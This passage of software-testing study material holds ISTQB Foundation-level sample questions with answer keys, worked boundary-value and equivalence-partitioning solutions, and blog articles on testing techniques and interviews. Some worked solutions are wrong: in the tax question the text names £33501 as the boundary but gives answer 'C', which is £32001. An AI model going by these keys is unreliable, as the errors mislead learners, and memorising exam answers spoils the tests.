c) to specify which modules to combine when, and how many at once
d) to specify how the software should be divided into modules
Q10 What is the purpose of a test completion criterion?
a) to know when a specific test has finished its execution
b) to ensure that the test case specification is complete
c) to set the criteria used in generating test inputs
d) to determine when to stop testing
Q11 Consider the following statements:
i. an incident may be closed without being fixed.
ii. incidents may not be raised against documentation.
iii. the final stage of incident tracking is fixing.
iv. the incident record does not include information on test environments.
a) ii is true, i, iii and iv are false
b) i is true, ii, iii and iv are false
c) i and iv are true, ii and iii are false
d) i and ii are true, iii and iv are false
Q12 Given the following code, which statement is true about the minimum
number of test cases required for full statement and branch coverage?
Read p
Read q
IF p+q > 100 THEN
Print “Large”
ENDIF
IF p > 50 THEN
Print “p Large”
ENDIF
a) 1 test for statement coverage, 3 for branch coverage
b) 1 test for statement coverage, 2 for branch coverage
c) 1 test for statement coverage, 1 for branch coverage
d) 2 tests for statement coverage, 2 for branch coverage
Q13 Consider the following statements:
i. 100% statement coverage guarantees 100% branch coverage.
ii. 100% branch coverage guarantees 100% statement coverage.
iii. 100% branch coverage guarantees 100% decision coverage.
iv. 100% decision coverage guarantees 100% branch coverage.
v. 100% statement coverage guarantees 100% decision coverage.
a) ii is True; i, iii, iv & v are False
b) i & v are True; ii, iii & iv are False
c) ii & iii are True; i, iv & v are False
d) ii, iii & iv are True; i & v are False
Q14 Functional system testing is:
a) testing that the system functions with other systems
b) testing that the components that comprise the system function together
c) testing the end to end functionality of the system as a whole
d) testing the system performs functions within specified response times
Q15 Incidents would not be raised against:
a) requirements
b) documentation
c) test cases
d) improvements suggested by users
Q16 Which of the following items would not come under Configuration
Management?
a) operating systems
b) test documentation
c) live data
d) user requirement documents
Q17 Maintenance testing is:
a) updating tests when the software has changed
b) testing a released system that has been changed
c) testing by users to ensure that the system meets a business need
d) testing to maintain business advantage
Q18 What can static analysis NOT find?
a) the use of a variable before it has been defined
b) unreachable (“dead”) code
c) memory leaks
d) array bound violations
Q19 Which of the following techniques is NOT a black box technique?
a) state transition testing
b) LCSAJ
c) syntax testing
d) boundary value analysis
Q20 Beta testing is:
a) performed by customers at their own site
b) performed by customers at the software developer’s site
c) performed by an Independent Test Team
d) performed as early as possible in the lifecycle
Q21 Given the following types of tool, which tools would typically be used by
developers, and which by an independent system test team?
i. static analysis
ii. performance testing
iii. test management
iv. dynamic analysis
a) developers would typically use i and iv; test team ii and iii
b) developers would typically use i and iii; test team ii and iv
c) developers would typically use ii and iv; test team i and iii
d) developers would typically use i, iii and iv; test team ii
Q22 The main focus of acceptance testing is:
a) finding faults in the system
b) ensuring that the system is acceptable to all users
c) testing the system with other systems
d) testing from a business perspective
Q23 Which of the following statements about component testing is FALSE?
a) black box test design techniques all have an associated test measurement technique
b) white box test design techniques all have an associated test measurement technique
c) cyclomatic complexity is not a test measurement technique
d) black box test measurement techniques all have an associated test design technique
Q24 Which of the following statements is NOT true?
a) inspection is the most formal review process
b) inspections should be led by a trained leader
c) managers can perform inspections on management documents
d) inspection is appropriate even when there are no written documents
Q25 A typical commercial test execution tool would be able to perform all of the
following, EXCEPT:
a) calculating expected outputs
b) comparison of expected outcomes with actual outcomes
c) recording test inputs
d) reading test values from a data file
Q26 The difference between re-testing and regression testing is:
a) re-testing ensures the original fault has been removed; regression testing looks for
unexpected side-effects
b) re-testing looks for unexpected side-effects; regression testing ensures the original
fault has been removed
c) re-testing is done after faults are fixed; regression testing is done earlier
d) re-testing is done by developers; regression testing is done by independent testers
Q27 Expected results are:
a) only important in system testing
b) only used in component testing
c) most useful when specified in advance
d) derived from the code
Q28 What type of review requires formal entry and exit criteria, including
metrics:
a) walkthrough
b) inspection
c) management review
d) post project review
Q29 Which of the following uses Impact Analysis most?
a) component testing
b) non-functional system testing
c) user acceptance testing
d) maintenance testing
Q30 What is NOT included in typical costs for an inspection process?
a) setting up forms and databases
b) analyzing metrics and improving processes
c) writing the documents to be inspected
d) time spent on the document outside the meeting
Q31 Which of the following is NOT a reasonable test objective:
a) to find faults in the software
b) to prove that the software has no faults
c) to give confidence in the software
d) to find performance problems
Q32 Which expression best matches the following characteristics of the review
processes:
1. led by the author
2. undocumented
3. no management participation
4. led by a moderator or leader
5. uses entry and exit criteria
s) inspection
t) peer review
u) informal review
v) walkthrough
a) s = 4 and 5, t = 3, u = 2, v = 1
b) s = 4, t = 3, u = 2 and 5, v = 1
c) s = 1 and 5, t = 3, u = 2, v = 4
d) s = 4 and 5, t = 1, u= 2, v = 3
Q33 Which of the following is NOT part of system testing?
a) business process-based testing
b) performance, load and stress testing
c) usability testing
d) top-down integration testing
Q34 Which statement about expected outcomes is FALSE?
a) expected outcomes are defined by the software’s behaviour
b) expected outcomes are derived from a specification, not from the code
c) expected outcomes should be predicted before a test is run
d) expected outcomes may include timing constraints such as response times
Q35 The standard that gives definitions of testing terms is:
a) ISO/IEC 12207
b) BS 7925-1
c) ANSI/IEEE 829
d) ANSI/IEEE 729
Q36 The cost of fixing a fault:
a) is not important
b) increases the later a fault is found
c) decreases the later a fault is found
d) can never be determined
Q37 Which of the following is NOT included in the Test Plan document of the Test
Documentation Standard?
a) what is not to be tested
b) test environment properties
c) quality plans
d) schedules and deadlines
Q38 Could reviews or inspections be considered part of testing?
a) no, because they apply to development documentation
b) no, because they are normally applied before testing
c) yes, because both help detect faults and improve quality
d) yes, because testing includes all non-constructive activities
Q39 Which of the following is not part of performance testing?
a) measuring response times
b) recovery testing
c) simulating many users
d) generating many transactions
Q40 Error guessing is best used:
a) after more formal techniques have been applied
b) as the first approach to deriving test cases
c) by inexperienced testers
d) after the system has gone live
Answers to all above questions:
Question Answer
1 C
2 C
3 D
4 D
5 C
6 A
7 B
8 A
9 C
10 D
11 B
12 B
13 D
14 C
15 D
16 C
17 B
18 C
19 B
20 A
21 A
22 D
23 A
24 D
25 A
26 A
27 C
28 B
29 D
30 C
31 B
32 A
33 D
34 A
35 B
36 B
37 C
38 C
39 B
40 A

ISTQB Foundation level exam Sample paper – III


1.Software testing activities should start
a. as soon as the code is written
b. during the design stage
c. when the requirements have been formally documented
d. as soon as possible in the development life cycle
2.Faults found by users are due to:
a. Poor quality software
b. Poor software and poor testing
c. bad luck
d. insufficient time for testing
3.What is the main reason for testing software before releasing it?
a. to show that system will work after release
b. to decide when the software is of sufficient quality to release
c. to find as many bugs as possible before release
d. to give information for a risk based decision about release
4. which of the following statements is not true
a. performance testing can be done during unit testing as well as during the testing of whole
system
b. The acceptance test does not necessarily include a regression test
c. Verification activities should not involve testers (reviews, inspections etc)
d. Test environments should be as similar to production environments as possible
5. When reporting faults found to developers, testers should be:
a. as polite, constructive and helpful as possible
b. firm about insisting that a bug is not a “feature” if it should be fixed
c. diplomatic, sensitive to the way they may react to criticism
d. All of the above
6.In which order should tests be run?
a. the most important tests first
b. the most difficult tests first(to allow maximum time for fixing)
c. the easiest tests first(to give initial confidence)
d. the order they are thought of
7. The later in the development life cycle a fault is discovered, the more expensive
it is to fix. why?
a. the documentation is poor, so it takes longer to find out what the software is doing.
b. wages are rising
c. the fault has been built into more documentation,code,tests, etc
d. none of the above
8. Which is not true-The black box tester
a. should be able to understand a functional specification or requirements document
b. should be able to understand the source code.
c. is highly motivated to find faults
d. is creative to find the system’s weaknesses
9. A test design technique is
a. a process for selecting test cases
b. a process for determining expected outputs
c. a way to measure the quality of software
d. a way to measure in a test plan what has to be done
10. Testware(test cases, test dataset)
a. needs configuration management just like requirements, design and code
b. should be newly constructed for each new version of the software
c. is needed only until the software is released into production or use
d. does not need to be documented and commented, as it does not form part of the
released
software system
11. An incident logging system
a only records defects
b is of limited value
c is a valuable source of project information during testing if it contains all incidents
d. should be used only by the test team.
12. Increasing the quality of the software, by better development methods, will
affect the time needed for testing (the test phases) by:
a. reducing test time
b. no change
c. increasing test time
d. can’t say
13. Coverage measurement
a. is nothing to do with testing
b. is a partial measure of test thoroughness
c. branch coverage should be mandatory for all software
d. can only be applied at unit or module testing, not at system testing
14. When should you stop testing?
a. when time for testing has run out.
b. when all planned tests have been run
c. when the test completion criteria have been met
d. when no faults have been found by the tests run
15. Which of the following is true?
a. Component testing should be black box, system testing should be white box.
b. if u find a lot of bugs in testing, you should not be very confident about the quality of
software
c. the fewer bugs you find,the better your testing was
d. the more tests you run, the more bugs you will find.
16. What is the important criterion in deciding what testing technique to use?
a. how well you know a particular technique
b. the objective of the test
c. how appropriate the technique is for testing the application
d. whether there is a tool to support the technique
17. If the pseudo code below were a programming language ,how many tests are
required to achieve 100% statement coverage?
1.If x=3 then
2. Display_messageX;
3. If y=2 then
4. Display_messageY;
5. Else
6. Display_messageZ;
7.Else
8. Display_messageZ;
a. 1
b. 2
c. 3
d. 4
18. Using the same code example as question 17,how many tests are required to
achieve 100% branch/decision coverage?
a. 1
b. 2
c. 3
d. 4
19 Which of the following is NOT a type of non-functional test?
a. State-Transition
b. Usability
c. Performance
d. Security
20. Which of the following tools would you use to detect a memory leak?
a. State analysis
b. Coverage analysis
c. Dynamic analysis
d. Memory analysis
21. Which of the following is NOT a standard related to testing?
a. IEEE829
b. IEEE610
c. BS7925-1
d. BS7925-2
22.which of the following is the component test standard?
a. IEEE 829
b. IEEE 610
c. BS7925-1
d. BS7925-2
23 which of the following statements are true?
a. Faults in program specifications are the most expensive to fix.
b. Faults in code are the most expensive to fix.
c. Faults in requirements are the most expensive to fix
d. Faults in designs are the most expensive to fix.
24. Which of the following is not the integration strategy?
a. Design based
b. Big-bang
c. Bottom-up
d. Top-down
25. Which of the following is a black box design technique?
a. statement testing
b. equivalence partitioning
c. error- guessing
d. usability testing
26. A program with high cyclometic complexity is almost likely to be:
a. Large
b. Small
c. Difficult to write
d. Difficult to test
27. Which of the following is a static test?
a. code inspection
b. coverage analysis
c. usability assessment
d. installation test
28. Which of the following is the odd one out?
a. white box
b. glass box
c. structural
d. functional
29. A program validates a numeric field as follows:
values less than 10 are rejected, values between 10 and 21 are accepted, values greater
than or equal to 22 are rejected

which of the following input values cover all of the equivalence partitions?

a. 10,11,21
b. 3,20,21
c. 3,10,22
d. 10,21,22
30. Using the same specifications as question 29, which of the following covers
the MOST boundary values?
a. 9,10,11,22
b. 9,10,21,22
c. 10,11,21,22
d. 10,11,20,21
Answers of all above Questions:
Question Answer
1. d
2. b
3. d
4. c
5. d
6. a
7. c
8. b
9. a
10. a
11. c
12. a
13. b
14. c
15. b
16. b
17. c
18. c
19. a
20. c
21. b
22. d
23. c
24. a
25. b
26. d
27. a
28. d
29. c
30. b

ISTQB Exam Questions on Equivalence


partitioning and Boundary Value Analysis
It’s important that all testers should be able to write test cases based on Equivalence
partitioning and Boundary value analysis. Taking this into consideration ISTQB is having
significant importance for this topic in ISTQB Foundation level Certificate exam. Good
practice and logical thinking can make it very easy to solve these questions.
What is Equivalence partitioning?
Equivalence partitioning is a method for deriving test cases. In this method, equivalence
classes (for input values) are identified such that each member of the class causes the same
kind of processing and output to occur. The values at the extremes (start/end values or
lower/upper end values) of such class are known as Boundary values. Analyzing the
behavior of a system using such values is calledBoundary value analysis (BVA).
Here are few sample questions for practice from ISTQB exam papers on
Equivalence partitioning and BVA. (Ordered: Simple to little complex)

Question 1
One of the fields on a form contains a text box which accepts numeric values in the range of
18 to 25. Identify the invalid Equivalence class.
a) 17
b) 19
c) 24
d) 21
Solution
The text box accepts numeric values in the range 18 to 25 (18 and 25 are also part of the
class). So this class becomes our valid class. But the question is to identify invalid
equivalence class. The classes will be as follows:
Class I: values < 18 => invalid class
Class II: 18 to 25 => valid class
Class III: values > 25 => invalid class
17 fall under invalid class. 19, 24 and 21 fall under valid class. So answer is ‘A’
Question 2
In an Examination a candidate has to score minimum of 24 marks in order to clear the
exam. The maximum that he can score is 40 marks. Identify the Valid Equivalence values if
the student clears the exam.
a) 22,23,26
b) 21,39,40
c) 29,30,31
d) 0,15,22
Solution
The classes will be as follows:
Class I: values < 24 => invalid class
Class II: 24 to 40 => valid class
Class III: values > 40 => invalid class
We have to indentify Valid Equivalence values. Valid Equivalence values will be there in
Valid Equivalence class. All the values should be in Class II. So answer is ‘C’
Question 3
One of the fields on a form contains a text box which accepts alpha numeric values. Identify
the Valid Equivalence class
a) BOOK
b) Book
c) Boo01k
d) Book
Solution
Alpha numeric is combination of alphabets and numbers. Hence we have to choose an
option which has both of these. A valid equivalence class will consist of both alphabets and
numbers. Option ‘c’ contains both alphabets and numbers. So answer is ‘C’
Question 4
The Switch is switched off once the temperature falls below 18 and then it is turned on
when the temperature is more than 21. When the temperature is more than 21. Identify the
Equivalence values which belong to the same class.
a) 12,16,22
b) 24,27,17
c) 22,23,24
d) 14,15,19
Solution
We have to choose values from same class (it can be valid or invalid class). The classes will
be as follows:
Class I: less than 18 (switch turned off)
Class II: 18 to 21
Class III: above 21 (switch turned on)
Only in Option ‘c’ all values are from one class. Hence the answer is ‘C’. (Please note that
the question does not talk about valid or invalid classes. It is only about values in same
class)
Question 5
A program validates a numeric field as follows: values less than 10 are rejected, values
between 10 and 21 are accepted, values greater than or equal to 22 are rejected. Which of
the following input values cover all of the equivalence partitions?
a. 10,11,21
b. 3,20,21
c. 3,10,22
d. 10,21,22
Solution
We have to select values which fall in all the equivalence class (valid and invalid both). The
classes will be as follows:
Class I: values <= 9 => invalid class
Class II: 10 to 21 => valid class
Class III: values >= 22 => invalid class
All the values from option ‘c’ fall under all different equivalence class.So answer is ‘C’.
Question 6
A program validates a numeric field as follows: values less than 10 are rejected, values
between 10 and 21 are accepted, values greater than or equal to 22 are rejected. Which of
the following covers the MOST boundary values?
a. 9,10,11,22
b. 9,10,21,22
c. 10,11,21,22
d. 10,11,20,21
Solution
We have already come up with the classes as shown in question 5. The boundaries can be
identified as 9, 10, 21, and 22. These four values are in option ‘b’. So answer is ‘B’
Question 7
In a system designed to work out the tax to be paid:
An employee has £4000 of salary tax free.
The next £1500 is taxed at 10%.
The next £28000 after that is taxed at 22%.
Any further amount is taxed at 40%.
To the nearest whole pound, which of these groups of numbers fall into three DIFFERENT
equivalence classes?
a) £4000; £5000; £5500
b) £32001; £34000; £36500
c) £28000; £28001; £32001
d) £4000; £4200; £5600
Solution
The classes will be as follows:
Class I : 0 to £4000 => no tax
Class II : £4001 to £5500 => 10 % tax
Class III : £5501 to £33500 => 22 % tax
Class IV : £33501 and above => 40 % tax
Select the values which fall in three different equivalence classes. Option ‘d’ has values from
three different equivalence classes. So answer is ‘D’.
Question 8
In a system designed to work out the tax to be paid:
An employee has £4000 of salary tax free.
The next £1500 is taxed at 10%.
The next £28000 after that is taxed at 22%.
Any further amount is taxed at 40%.
To the nearest whole pound, which of these is a valid Boundary Value Analysis test case?
a) £28000
b) £33501
c) £32001
d) £1500
Solution
The classes are already divided in question # 7. We have to select a value which is a
boundary value (start/end value). 33501 is a boundary value. So answer is ‘C’.
Question 9
Given the following specification, which of the following values for age are in the SAME
equivalence partition?
If you are less than 18, you are too young to be insured.
Between 18 and 30 inclusive, you will receive a 20% discount.
Anyone over 30 is not eligible for a discount.
a) 17, 18, 19
b) 29, 30, 31
c) 18, 29, 30
d) 17, 29, 31
Solution
The classes will be as follows:
Class I: age < 18 => not insured
Class II: age 18 to 30 => 20 % discount
Class III: age > 30 => no discount
Here we cannot determine if the above classes are valid or invalid, as nothing is mentioned
in the question. (But according to our guess we can say I and II are valid and III is invalid.
But this is not required here.) We have to select values which are in SAME equivalence
partition. Values from option ‘c’ fall in same partition. So answer is ‘C’.
These are few sample questions for practice from ISTQB papers. We will continue
to add more ISTQB question papers with answers in coming posts.
About the Author:
This is a guest article by “N. Sandhya Rani”. She is having around 4 years of
experience in software testing mostly in manual testing. She is helping many aspirant
software testers to clear the ISTQB testing certification exam.
Put your questions related to ISTQB exam in comment section below.

Some tricky question answers


1. Define the following along with examples

a. Boundary Value testing


b. Equivalence testing
c. Error Guessing
d. Desk checking
e. Control Flow analysis

Answer:
1-a) Boundary value Analysis: -
A process of selecting test cases/data by
identifying the boundaries that separate valid and invalid conditions. Tests are
constructed to test the inside and outside edges of these boundaries, in addition to
the actual boundary points. or A selection technique in which test data are chosen to
lie along “boundaries” of the input domain [or output range] classes, data structures,
procedure parameters, etc. Choices often include maximum, minimum, and trivial
values or parameters.
E.g. – Input data 1 to 10 (boundary value)
Test input data 0, 1, 2 to 9, 10, 11
1-b) Equivalence testing: -
The input domain of the system is partitioned into classes
of representative values, so that the no of test cases can be limited to one-per-class,
which represents the minimum no. of test cases that must be executed.
E.g.- valid data range: 1-10
Test set:-2; 5; 14
1-c) Error guessing: -
Test data selection technique. The selection criterion is to pick
values that seem likely to cause errors Error guessing is based mostly upon
experience, with some assistance from other techniques such as boundary value
analysis. Based on experience, the test designer guesses the types of errors that
could occur in a particular type of software and designs test cases to uncover them.
E.g. – For example, if any type of resource is allocated dynamically, a good place to
look for errors is in the de-allocation of resources. Are all resources correctly deallocated,
or are some lost as the software executes?
1-d) Desk checking: -
Desk checking is conducted by the developer of the system or
program. The process involves reviewing the complete product to ensure that it is
structurally sound and that the standards and requirements have been met. This is
the most traditional means for analyzing a system or program.
1-e) Control Flow Analysis: -
It is based upon graphical representation of the
program process. In control flow analysis; the program graphs has nodes which
represent a statement or segment possibly ending in an unresolved branch. The
graph illustrates the flow of program control from one segment to another as
illustrated through branches .the objective of control flow analysis is to determine
the potential problems in logic branches that might result in a loop condition or
improper processing .

Black Box Testing: Types and techniques of BBT


I have covered what is White box Testing in previous article. Here I will concentrate on
Black box testing. BBT advantages, disadvantages and and How Black box testing is
performed i.e the black box testing techniques.
Black box testing treats the system as a “black-box”, so it doesn’t explicitly use
Knowledge of the internal structure or code. Or in other words the Test engineer need not
know the internal working of the “Black box” or application.
Main focus in black box testing is on functionality of the system as a whole. The
term ‘behavioral testing’ is also used for black box testing and white box testing is also
sometimes called ‘structural testing’. Behavioral test design is slightly different from
black-box test design because the use of internal knowledge isn’t strictly forbidden, but it’s
still discouraged.
Each testing method has its own advantages and disadvantages. There are some bugs that
cannot be found using only black box or only white box. Majority of the applicationa are
tested by black box testing method. We need to cover majority of test cases so that most of
the bugs will get discovered by blackbox testing.

Black box testing occurs throughout the software development and Testing life cycle i.e in
Unit, Integration, System, Acceptance and regression testing stages.

Tools used for Black Box testing:


Black box testing tools are mainly record and playback tools. These tools are used for
regression testing that to check whether new build has created any bug in previous working
application functionality. These record and playback tools records test cases in the form of
some scripts like TSL, VB script, Java script, Perl.
Advantages of Black Box Testing
- Tester can be non-technical.
- Used to verify contradictions in actual system and the specifications.
- Test cases can be designed as soon as the functional specifications are complete
Disadvantages of Black Box Testing
- The test inputs needs to be from large sample space.
- It is difficult to identify all possible inputs in limited testing time. So writing test cases is
slow and difficult
- Chances of having unidentified paths during this testing
Methods of Black box Testing:
Graph Based Testing Methods:
Each and every application is build up of some objects. All such objects are identified and
graph is prepared. From this object graph each object relationship is identified and test
cases written accordingly to discover the errors.
Error Guessing:
This is purely based on previous experience and judgment of tester. Error Guessing is the
art of guessing where errors can be hidden. For this technique there are no specific tools,
writing the test cases that cover all the application paths.
Boundary Value Analysis:
Many systems have tendency to fail on boundary. So testing boundry values of application
is important. Boundary Value Analysis (BVA) is a test Functional Testing technique where
the extreme boundary values are chosen. Boundary values include maximum, minimum,
just inside/outside boundaries, typical values, and error values.
Extends equivalence partitioning
Test both sides of each boundary
Look at output boundaries for test cases too
Test min, min-1, max, max+1, typical values
BVA techniques:
1. Number of variables
For n variables: BVA yields 4n + 1 test cases.
2. Kinds of ranges
Generalizing ranges depends on the nature or type of variables
Advantages of Boundary Value Analysis
1. Robustness Testing – Boundary Value Analysis plus values that go beyond the limits
2. Min – 1, Min, Min +1, Nom, Max -1, Max, Max +1
3. Forces attention to exception handling
Limitations of Boundary Value Analysis
Boundary value testing is efficient only for variables of fixed values i.e boundary.
Equivalence Partitioning:
Equivalence partitioning is a black box testing method that divides the input domain of a
program into classes of data from which test cases can be derived.
How is this partitioning performed while testing:
1. If an input condition specifies a range, one valid and one two invalid classes are defined.
2. If an input condition requires a specific value, one valid and two invalid equivalence
classes are defined.
3. If an input condition specifies a member of a set, one valid and one invalid equivalence
class is defined.
4. If an input condition is Boolean, one valid and one invalid class is defined.
Comparison Testing:
Different independent versions of same software are used to compare to each other for
testing in this method.
Reference- http://www.softrel.org/stgb.html

Some interesting Software testing interview


questions
In this post I am going to answer some of the questions asked by one of the reader Srinivas
M.

1. In an application currently in production, one module of code is being modified.


Is it necessary to re-test the whole application or is it enough to just test
functionality associated with that module?
Vijay: Well, the answer is both. You will have to test the functionality of that module as well
as the other modules. But you can differentiate on the stress to be given on the module to
be tested.
I think this scenario will explain the answer to your question well.

If Module A is modified, Module B is depending on module A, and Module C is a general


module independent of module A.
So in this case you will test the module A in depth to all test cases. Then your next stress
will be on module B. Wait now what about module C? You will have to test this module as
well but may be with less stress because module C is not depend on module A but may be
depend on module B.
Again if you are a white box tester you probably know which modules will get affected and
which modules should be tested. But as a black box tester you will need to do regression
testing as well.

2. What is the most challenging situation you had during testing?


Vijay: A good question! When I switched my job some years back I was being asked the
same question.
Well a good answer to this question is depends on each ones experience. If you came across
any such a situation and found any interesting Bug that was difficult to find out or analyzed
any project risk accurately before occurring then this could be the answer to this question.
Keep in mind that when answering such a question, be realistic and don’t overstress the
situation.
3. What are you going to do if there is no Functional Spec or any documents
related to the system and developer who wrote the code does not work in the
company anymore, but you have system and need to test?
Vijay: A typical situation in Indian companies! Right? Due to high attrition rate
In this case fist you will need to do the exploratory testing of the product. In this testing
you will come to know the system and its basic workflow. In exploratory testing you can
also find some ‘blocker’ bugs that cause system to be crash.
If you are a white box tester then next step you can do is to see the different module code.
By this you will know the test cases for different modules and relation of modules.

Software testing questions and answers


This article is the part software testing question and answer series. Here I will
answer some reader’s questions asked to me in comments or using contact form. If you
have queries on software testing, quality assurance or career in testing then you can ask
me these questions in comment section below.
It’s not possible to address each and every question in detail as I observed the questions
are on vast topics, for which detail answers will itself require a new article. I will answer
such questions in brief here and will also write detail articles separately if required.

So let’s get some questions answered:


Naresh A. asks:
“My past experience was related to “Test Engineer”. Recently I am appointed as Test Lead
in a product based company. Currently there is no Pre-established testing process. As a TL
am meant to define a standard process for the entire testing flow and I will maintain certain
documents for each product.
Can you help me out in establishing a process for testing, and make me know the entire
responsibilities of TL and what documents I am supposed to prepare and maintain?”
As a team leader you are responsible for project planning, scheduling, communicating
your project status to your manager and most important task of assigning and monitoring
the project work. Your main responsibility is to build a team to achieve your project goals.
You need to focus on handling the challenges in your project so that your team and project
will grow and perform well.
As far as the standard testing process is considered, it’s depends on you – what
procedure you want to establish. Yes some people might blame me for this point but I
prefer to establish my own processes that work for me. I don’t stick to those old process
definitions that are written and managed in some 90′s and most of which might not
applicable nowadays.
Test lead is responsible for ensuring project plan changes are incorporated in test plan. You
might write a test plan and test strategy (In some cases it might be written by senior test
team member or even by project test manager) Ensure the work is going according to this
test plan. Identify the risks and try to mitigate them. At the end of project testing life cycle
ensure that all test objectives are accomplished and acceptance criteria is met.
More TL responsibilities includes: Test Case Review, Requirements Validation,
Monitoring the execution of manual and automated test cases, Prepare test summary report
and Communicate test status to seniors and prepare corresponding documents.
To know more on SQA processes read this article “SQA Processes- How to Test complete
application“. Hope from this answer you will get good idea of testing processes and TL
responsibilities.
Pavan Ankus asks:
“I am appearing for the QA positions in US. I would kindly request you to mail me the
suitable challenging situations in manual testing and also since I don’t have domain
knowledge in Insurance, finance and other financial domain experience I am finding hard to
explain to the interviewer as an experienced person. In this regard I need your suitable
answer as to how to face the interviewer?”
In every testing interview you will get this question: “Tell me any challenging
situation you faced in your previous projects or Tell me any bug that you feel proud to find
it?”
I think answers to these questions depend on your testing career. I know every one of you
might have faced many challenging situations where exceptional thinking is required to
solve such problems.

I will suggest to pick any such situation from you career and explain it in better
way. At least it should sound challenging This will help you to face further questions
from interviewer depending on your answer.
The broad challenges in manual testing are: How to ensure complete test coverage?
Testing without an automation tool is itself a big challenge. You can also explain non-
technical challenges in manual testing like managing the testing work in critical time (Llink
to testing under time limit) i.e. completing testing before deadline and even worst case if
the deadline itself is not feasible.
Explaining a challenging bug you found in your career can be also a good answer for this
question. For example the bug that was difficult to find or reprove or having big impact on
customer revenue etc.
Pavan you mentioned that you don’t have knowledge in banking and finance domain then
how you expect from yourself to give answer on that? If you don’t have experience in
banking and finance domain then do not put this as a skill in your resume just for the sake
of matching your profile with employer requirements. If you really want to get into testing
of BFSI (Banking, Financial services and Insurance) domain then first study
this domain. Know the basic concepts in BFSI domain. See the resources I have listed on
BFSI domain on ourresource page. Keep in mind you can answer in detail about any
question if you have worked on that.
Mitch asks:
“What is the best way to go about getting a pay rise? Is reporting and graphing bugs found
compared to other team member a good idea?
Comparing the bug count with other team or team member is very bad idea to ask
for pay rise. If you are working for the organization for long time then your employer know
your value and importance in organization. There is no need to show how your bug count
graph is higher than your counterparts.
So what is the best way to ask for good salary rise?
At the time of your performance appraisal you should be able to convince to your reviewer
that how you worked hard for your organization, How you succeeded in managing difficult
tasks and how you enhanced your skills to better match your current work profile. If you
succeed in this negotiation then you will definitely get good pay rise.
Other factors considered while giving you pay rise:
Your relevant skills, Complexity of application you are working on, problem solving skill,
total and relevant experience, education andcertifications.

What Types of Database Questions are Asked in


Interview for Testing Positions? – Testing Q&A
Series
This article is a part of software testing questions and answers series. You can see all
previous articles under this Q&A series on this page –Software Testing Questions &
Answers. If you want to ask a question, just write a comment below.
Mallik asks:
What type of database (SQL) questions asked in interviews for test
engineer position (not for database tester)?
This depends on many factors whether these questions are for testing positions at entry
level or for experienced testing professionals. The depth of database interview questions
depend on the experience of the candidate.

Irrespective of the position, candidate should always be clear and confident about the
database concepts. For most software testing positions you need to have database
knowledge to perform some database checks. Almost all applications need an interaction
with database.
Let’s consider the database interview questions for entry-level software testing
positions. For entry level testing positions generally following questions can be
asked in interviews:
1) Basic and to some extent nested SQL queries to fetch data from database tables.
2) Examples of database statements for: Create Database, Create table and Drop Table.
3) Concept of “Primary Key”, “Foreign Key” and DB index
4) Examples of Select, Insert, Delete, Alter and Update SQL statements.
5) SQL joins (Inner Join, Left Join, Right Join and Full join) with examples.
Practice SQL join queries on dummy tables and see results.
For experienced level software testing positions, database interview questions depend on
the job requirement. For such positions interviewers expect detailed database knowledge
from candidates.

One more important point – If you get questions on database SQL queries, never say
that “You get all query statements to be executed from developers”. It’s ok to say that you
get help from developers to write complex SQL queries, but finally you manage by your
own.
Shariff asks:
What is Test Strategy?
In simple words – Test strategy means “How you are going to test the application?” You
need to mention the exact process/strategy that you are going to follow when you will get
the application for testing.

I see many companies follow test strategy template very strictly. Even without any standard
template you can keep this test strategy document simple but still effective.

Simple Tips to Write Test Strategy Document:


1) Include product background in test strategy document. In first paragraph of your test
strategy document answer – Why stakeholders want to develop this project? This will help
to understand and prioritize things quickly.
2) List all important features you are going to test. If you think some features are not part
of this release then mention those features under “Features not to be tested” label.
3) Write down the test approach for your project. Clearly mention what types of testing you
are going to conduct?
I.e. Functional testing, UI testing, Integration testing, Load/Stress testing, Security testing
etc.
4) Answer questions like: How you are going to perform functional testing? Manual or
automation testing? Are you going to execute all test cases from your test management
tool?
5) Which bug tracking tool you are going to use? What will be the process when you will
find a new bug?
6) What are your test entry and exit criteria?
7) How you will track your testing progress? What metrics are you going to use for tracking
test completion?
8 ) Task distribution – Define roles and responsibilities of each team member.
9) What documents you will produce during and after testing phase?
10) What all risk you see in test completion?
If you answer all these questions, I think your test strategy document should be ready!
Regression Testing with Regression Testing
Tools and methods
What is Regression Software Testing?
Regression means retesting the unchanged parts of the application. Test cases are re-
executed in order to check whether previous functionality of application is working fine and
new changes have not introduced any new bugs.
This is the method of verification. Verifying that the bugs are fixed and the newly added
feature have not created in problem in previous working version of software.
Why regression Testing?
Regression testing is initiated when programmer fix any bug or add new code for new
functionality to the system. It is a quality measure to check that new code complies with old
code and unmodified code is not getting affected.
Most of the time testing team has task to check the last minute changes in the system. In
such situation testing only affected application area in necessary to complete the testing
process in time with covering all major system aspects.
How much regression testing?
This depends on the scope of new added feature. If the scope of the fix or feature is large
then the application area getting affected is quite large and testing should be thoroughly
including all the application test cases. But this can be effectively decided when tester gets
input from developer about the scope, nature and amount of change.
What we do in regression testing?
• Rerunning the previously conducted tests
• Comparing current results with previously executed test results.
Regression Testing Tools:
Automated Regression testing is the testing area where we can automate most of the
testing efforts. We run all the previously executed test cases this means we have test case
set available and running these test cases manually is time consuming. We know the
expected results so automating these test cases is time saving and efficient regression
testing method. Extent of automation depends on the number of test cases that are going
to remain applicable over the time. If test cases are varying time to time as application
scope goes on increasing then automation of regression procedure will be the waste of time.
Most of the regression testing tools are record and playback type. Means you will record the
test cases by navigating through the AUT and verify whether expected results are coming or
not.
Example regression testing tools are:
• Winrunner
• QTP
• AdventNet QEngine
• Regression Tester
• vTest
• Watir
• Selenium
• actiWate
• Rational Functional Tester
• SilkTest
Most of the tools are both Functional as well as regression testing tools.

Regression Testing Of GUI application:


It is difficult to perform GUI(Graphical User Interface) regression testing when GUI structure
is modified. The test cases written on old GUI either becomes obsolete or need to reuse.
Reusing the regression testing test cases means GUI test cases are modified according to
new GUI. But this task becomes cumbersome if you have large set of GUI test cases.

Software Installation/Uninstallation Testing


Have you performed software installation testing? How was the experience? Well,
Installation testing (Implementation Testing) is quite interesting part of software testing life
cycle.

Installation testing is like introducing a guest in your home. The new guest should be
properly introduced to all the family members in order to feel him comfortable. Installation
of new software is also quite like above example.

If your installation is successful on the new system then customer will be


definitely happy but what if things are completely opposite. If installation fails then
our program will not work on that system not only this but can leave user’s system badly
damaged. User might require to reinstall the full operating system.
In above case will you make any impression on user? Definitely not! Your first impression to
make a loyal customer is ruined due to incomplete installation testing. What you need to
do for a good first impression? Test the installer appropriately with combination of
both manual and automated processes on different machines with different
configuration. Major concerned of installation testing is Time! It requires lot of time to even
